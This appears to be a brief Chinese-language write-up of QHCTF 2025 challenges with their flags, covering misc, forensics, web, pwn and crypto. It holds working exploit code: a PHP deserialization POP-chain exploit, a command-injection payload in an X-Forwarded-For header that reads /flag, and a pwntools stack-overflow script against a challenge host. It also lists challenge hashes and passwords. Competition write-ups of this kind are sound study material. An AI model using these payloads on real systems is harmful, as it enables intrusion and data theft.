misc
PvzHE
去这个文件夹
有一张图片
QHCTF{300cef31-68d9-4b72-b49d-a7802da481a5}
QHCTF For Year 2025
攻防世界有一样的
080714212829302316092230
对应Q
以此类推
QHCTF{FUN}
请找出拍摄地所在位置
柳城
顺丰
forensics
win01
这个软件
云沙盒分析一下
md5
ad4fdee2eada36ec3c20e9d6311cf258
Win_02
HackY$
32ED87BDB5FDC5E9CBA88547376818D4
123456
HackY$_123456
fb484ad326c0f3a4970d1352bfbafef8
Win_07
找到密码
Th3_1s_F1ag.Z1p_P@ssW0rd_Y0u_Now
解压
QHCTF{6143b46a-8e98-4356-a9b2-251a7ec19e51}
web
Web_pop
<?php
error_reporting(0);
highlight_file(__FILE__);
class Start{
public $name;
protected $func;
public function __destruct()
{
echo "Welcome to QHCTF 2025, ".$this->name;
}
public function __isset($var)
{
($this->func)();
}
}
class Sec{
private $obj;
private $var;
public function __toString()
{
$this->obj->check($this->var);
return "CTFers";
}
public function __invoke()
{
echo file_get_contents('/flag');
}
}
class Easy{
public $cla;
public function __call($fun, $var)
{
$this->cla = clone $var[0];
}
}
class eeee{
public $obj;
public function __clone()
{
if(isset($this->obj->cmd)){
echo "success";
}
}
}
if(isset($_POST['pop'])){
unserialize($_POST['pop']);
} 后门在这里file_get_contents('/flag');
然后逆着看
__invoke
($this->func)();->__invoke
if(isset(this-\>obj-\>cmd))-\>(this->func)();->__invoke
this-\>cla = clone var[0];-> if(isset(this-\>obj-\>cmd))-\>(this->func)();->__invoke
this-\>obj-\>check(this->var);->this-\>cla = clone var[0];-> if(isset(this-\>obj-\>cmd))-\>(this->func)();->__invoke
echo "Welcome to QHCTF 2025, ".this-\>name;-\> this->obj->check(this-\>var);-\>this->cla = clone var\[0\];-\> if(isset(this->obj->cmd))->($this->func)();->__invoke
这样来触发。
也就是
$a=new Start();
$a->name=new Sec();
$a->name->obj=new Easy();
$a->name->obj->cla=new eeee();
$a->name->obj->cla->obj=new Start();
$a->name->obj->cla->obj->func=new Sec();
exp:
<?php
error_reporting(0);
highlight_file(__FILE__);
class Start
{
public $name;
public $func;
}
class Sec
{
public $obj;
public $var;
}
class Easy
{
public $cla;
}
class eeee
{
public $obj;
}
$a = new Start;
$b = new Sec;
$c = new Easy;
$d = new eeee;
$e = new Sec;
$f = new Start;
$a->name = $b;
$b->obj = $c;
$b->var = $d;
$d->obj = $f;
$f->func = $e;
echo serialize($a);Easy_include
即可命令执行
Web_IP
IP的地方可以执行命令
X-Forwarded-For: {system('cat /flag')}
PCREMagic
可以上传文件,对文件名没有限制,最后都会重命名1-9.php
关键是文件内容检测<?php
pwn
Easy_Pwn
vulnerable
栈溢出
exp
from pwn import*
from struct import pack
from ctypes import *
#from LibcSearcher import *
context(os='linux',arch='amd64',log_level='debug')
p=remote('154.64.245.108',33135)
#p=process('./pwn')
libc=ELF("/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6")
elf=ELF('./pwn')
def bug():
gdb.attach(p)
pause()
def s(a):
p.send(a)
def sa(a,b):
p.sendafter(a,b)
def sl(a):
p.sendline(a)
def sla(a,b):
p.sendlineafter(a,b)
def r(a):
p.recv(a)
def pr(a):
print(p.recv(a))
def rl(a):
return p.recvuntil(a)
def inter():
p.interactive()
def get_addr64():
return u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
def get_addr32():
return u32(p.recvuntil("\xf7")[-4:])
def get_sb():
return libc_base+libc.sym['system'],libc_base+libc.search(b"/bin/sh\x00").__next__()
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
pay=b'a'*0x58+p64(0x4011ca)
#bug()
s(pay)
inter()
cr
Easy_RSA
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
import base64
# 生成RSA密钥对
private_key = b'-----BEGIN RSA PRIVATE KEY-----\nMIICXAIBAAKBgQCYQjRaBQcBJmdxdCo4YaK/8TIdlj9Cjt6ewjF8NzV7BAj5ZEXy\nsuXdYbXVOAmVKDYKglo9TKUbRVKbPk7f3rIfnIrMqm8TpJTPAnyssiXs3Zy9yz+p\nqWbRTvd0xWJoWxy9TTzdczkS8yVkRBIdNJ3ghJV8B5YVkgFtMoyPX8TQhQIDAQAB\nAoGARibOvyEs2oNKyvO2VjbqCRzEtewZZn20JZqcuTooum6gAeQI9GsnzKnt4PkK\nNT6LM6lekXrEYb29c0iwh6YwE/mOIu5G3Yz2qQJDyZEqvM4N4KnITJM4v1WPv7tC\nurpZj906Odbx6oFXNc5XJMGp6GgjOqqLomBCcRvKlKdX36sCQQDA3GGS4Hy5htlQ\nydkiQujUAAlcoTlx/kPZSrCOehBsOWytwRjiGm1xTu6s8mBY2O+kIDZx1DGbDQ54\nKi9jJqWfAkEAyhr1iR9mofi+WqSfcG41jjmLFUgKFcO/ImcE3kcs2eGLodoyOJF1\nCBPw8ANME36OJiwXNSFOyQJWuzNoJchvWwJAG36Pjn/gaBaYXpMYGHFPfgGvU/xM\nEzs7cvvZ5cXzF2qsWqz/niREW/XzwsYfBCuRJmXNPTcSB1e6K1lgPhNhYwJBALZg\nxZnL4E3hrcUWMVq/2UxS2ROHQrKJRf3BgT8kc3Dae6q+v/sUJ8v2UsID967P0W7Y\n8shbGkGB/spHhYAy82kCQE7UVrGsArk46F1snawUIPUPMye3yBwvCeyCSX+WyQ7h\nS1IaHaAy3kJ9J/0faMDayG724TpMcsBii1pU2Hhh8p0=\n-----END RSA PRIVATE KEY-----'
public_key = b'-----BEGIN PUBLIC KEY-----\nMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCYQjRaBQcBJmdxdCo4YaK/8TId\nlj9Cjt6ewjF8NzV7BAj5ZEXysuXdYbXVOAmVKDYKglo9TKUbRVKbPk7f3rIfnIrM\nqm8TpJTPAnyssiXs3Zy9yz+pqWbRTvd0xWJoWxy9TTzdczkS8yVkRBIdNJ3ghJV8\nB5YVkgFtMoyPX8TQhQIDAQAB\n-----END PUBLIC KEY-----'
enmessage="PSvEAGef52/sz8q2f3jjC2OJP9pYEa04kSTeTIX3swnAMrJw9ZagvLRplqk+NjdCmvRAbnbYrBXi9aP8sz604rqn+7S58WTyPgnqIkFwynHBY7NTmvVAKKDc7GJWltQql4iVAxFbrwIBREcSZJwhloWGmCa5dBjlMEzWtv6Jx0o="
def encrypt_message(message, public_key):
key = RSA.import_key(public_key)
cipher = PKCS1_OAEP.new(key)
encrypted_message = cipher.encrypt(message.encode())
return base64.b64encode(encrypted_message).decode()
def decrypt_message(encrypted_message, private_key):
key = RSA.import_key(private_key)
cipher = PKCS1_OAEP.new(key)
decrypted_message = cipher.decrypt(base64.b64decode(encrypted_message))
return decrypted_message.decode()
#message = "Hello, this is a secret message!"
# encrypted = encrypt_message(message, public_key)
# print("加密后的消息:")
# print(encrypted)
decrypted = decrypt_message(enmessage, private_key)
print("解密后的消息:")
print(decrypted)传入题目给的公钥,私钥,以及密文(访问靶机/encode)即可
QHCTF{ec9ee719-8336-4a7c-8c7f-745c89d220ce}